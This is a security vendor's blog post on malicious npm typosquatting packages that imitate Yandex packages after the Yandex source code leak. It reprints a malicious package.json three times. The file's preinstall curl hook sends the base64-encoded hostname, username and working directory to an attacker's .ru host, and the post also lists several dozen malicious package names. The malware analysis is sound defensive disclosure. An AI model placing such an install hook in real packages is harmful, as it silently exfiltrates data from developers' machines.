Yandex Data Leak Triggers Malicious Package Publication

Yandex Data Leak Triggers Malicious Package Publication
Table of Contents

It would be big news, to say the least, if a large quantity of Google source code found its way into the public domain. Now imagine if the leak also included source code from Amazon and Uber. That’s the scale of the data leak that hit Russian tech giant Yandex. The risk here is that malicious actors could analyze the leaked code and discover exploitable security gaps. Indeed, the Mend research team has already seen malicious packages that take advantage of Yandex-related packages, primarily typosquatting.  The packages were quickly discovered and blocked by Mend Supply Chain Defender and reported to the npm registry. 

The initial heist

According to Bleeping Computer, the files were allegedly stolen by a former employee of the Russian technology company and leaked as a Torrent on the Breached online forum. As software engineer Arseniy Shestakov noted in a recent blog post, the leak contained source code of nearly every service offered by Yandex, including the following:

  • Search 
  • Maps 
  • Alice (think Siri/Alexa)
  • Market (similar to Amazon)
  • Cloud 
  • Pay 
  • Taxi 
  • Direct
  • Mail 
  • Disk 
  • Travel 
  • Yandex360

In an official statement, Yandex said that the leaked data differs from the current version of the repository used in Yandex services. “We are conducting an internal investigation into the reasons for getting fragments of the source code into the public domain, but we do not see any threat to our users’ data or platform performance,” the company said.

However, it does give threat actors an awful lot of source code to investigate. While the code may not be identical to the current version, chances are that there are plenty of similarities — certainly enough for threat actors to discover exploitable security vulnerabilities, starting with the malicious packages discovered by Mend.

Our findings

Typosquatting incidents involve the creation of malicious packages that mimic well-known and trusted packages, often with slight variations in the name, to trick developers into downloading and installing them. 

One such attack was discovered involving the Yandex leak described above. In response to the leak, we have noticed that a few attackers have taken advantage of this situation by creating malicious packages that mimic popular Yandex packages. One such example is the package ‘@yandex-travel/ts-config’:

{"name": "@yandex-travel/ts-config", "version": "0.1.1", "description": "Hello =)", "main": "index.js", "scripts": {"test": "echo \"Error: no test specified\" && exit 1", "preinstall": "curl -H \"Package: @yandex-travel/ts-config\" -H \"Version: 0.1.1\" -H \"Hostname: $(hostname | base64)\" -H \"Whoami: $(whoami | base64)\" -H \"Pwd: $(pwd | base64)\"  -d \"meow! security test\" http://npm-org.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru"}, "author": "act1on3", "license": "ISC"}

Figure 1 – The content of package.json under ‘@yandex-travel/ts-config’

By making the code a one-liner, the attacker can attempt to evade detection and increase the chances of successfully compromising the system.

A more readable version of the code would be:

{
    "name": "@yandex-travel/ts-config",
    "version": "0.1.1",
    "description": "Hello =)",
    "main": "index.js",
    "scripts": {
        "test": "echo \"Error: no test specified\" && exit 1",
        "preinstall": "curl -H \"Package: @yandex-travel/ts-config\" -H \"Version: 0.1.1\" -H \"Hostname: $(hostname | base64)\" -H \"Whoami: $(whoami | base64)\" -H \"Pwd: $(pwd | base64)\"  -d \"meow! security test\" http://npm-org.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru"
    },
    "author": "act1on3",
    "license": "ISC"
}

Figure 2 – A more readable version of package.json

The malicious script explained

The malicious part is the preinstall command which can be easier to read and understand in the following format:

preinstall": "
  curl \
    -H "Package: @yandex-travel/ts-config" \
    -H "Version: 0.1.1" \
    -H "Hostname: $(hostname | base64)" \
    -H "Whoami: $(whoami | base64)" \
    -H "Pwd: $(pwd | base64)" \
    -d "meow! security test" \
    http://npm_org.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru

Figure 3 – An easy-to-read format of the malicious script

The script is executing the curl command, which is a tool used to transfer data from or to a server. The following information is being sent to the remote server located at hxxp[://]npm_org[.]bl04szombv0uaoedbxwle53be2ks8h[.]c[.]act1on3[.]ru:

  • The package name.
  • The version number.
  • The hostname of the system, encoded into base64.
  • The username of the current user, encoded into base64.
  • The current working directory, encoded into base64.
  • The message “meow! security test”.

This information is being sent in the form of HTTP headers, specified using the -H flag, and as data in the HTTP request body, specified using the -d flag. The purpose of this script is malicious, as it sends sensitive information about the system and user to a remote server.

Malicious packages found

Under the typosquatting attack targeting Yandex, various malicious packages were found on the npm registry. Here is a list of some of the packages caught at the time of publication, although it is not a complete list:

  • yandex-logger-std
  • yandex-cfg-env
  • yandex-logger-sentry
  • yandex-logger-qloud
  • yabox
  • @yandex-travel/ts-config
  • @yandex-travel/eslint-config
  • @yandex-travel/ci
  • @yandex-travel/ui
  • @yandex-travel/eslint-kit
  • yasap-lodash
  • yandex-sendlinksms
  • yt-test-reporter
  • ymaps-api-response
  • eslint-plugin-yandex-morda-views
  • yandex-sendsms testpalm-api
  • ymaps-tanker
  • yastatic-s3
  • yandex-dch-up
  • yasap-gulp-tools
  • yb-frontend-utils express-yandex-send-limit
  • yb-frontend-components
  • yasap-gulp-dev-tools tools-access-react
  • react-wp-viewer tanker-pilot issues-changelog-generator
  • yandex-net toloka-templates-deploy
  • yasap-cache bunker-tjson
  • y-font-decoder
  • yandex-cssformat
  • yandex-bro-embedded-site-api
  • yandex-sanitizer
  • tslint-ymaps-rules

We believe that there is a connection between the latest increase in malicious packages targeting Yandex and the recent media coverage of the leaked source code repository. While we cannot assert this with complete certainty, it is an assumption we have arrived at, as a result of our current findings. This situation has prompted many malicious actors to initiate dependency confusion attacks, with the aim of compromising the security of the Yandex organization.

How to protect your organization

Mend Supply Chain Defender alerted our research team to this incident, enabling us to quickly identify it and understand how to address it.

The best way to thwart malicious efforts like this is to use an automated security solution such as Mend Supply Chain Defender, which informs you when you import a malicious package from open-source registries.

Manage open source risk

Recent resources

More than 100K sites impacted by Polyfill supply chain attack

The new Chinese owner tampers with the code of cdn.polyfill.io to inject malware targeting mobile devices.

Read more

Over 100 Malicious Packages Target Popular ML PyPi Libraries

Discover the latest security threat as over 100 malicious packages target popular ML PyPi libraries. Learn about the attack methods.

Read more

What New Security Threats Arise from The Boom in AI and LLMs?

Explore the security threats arising from the boom in AI and LLMs, including data privacy, misinformation, and resource exhaustion.

Read more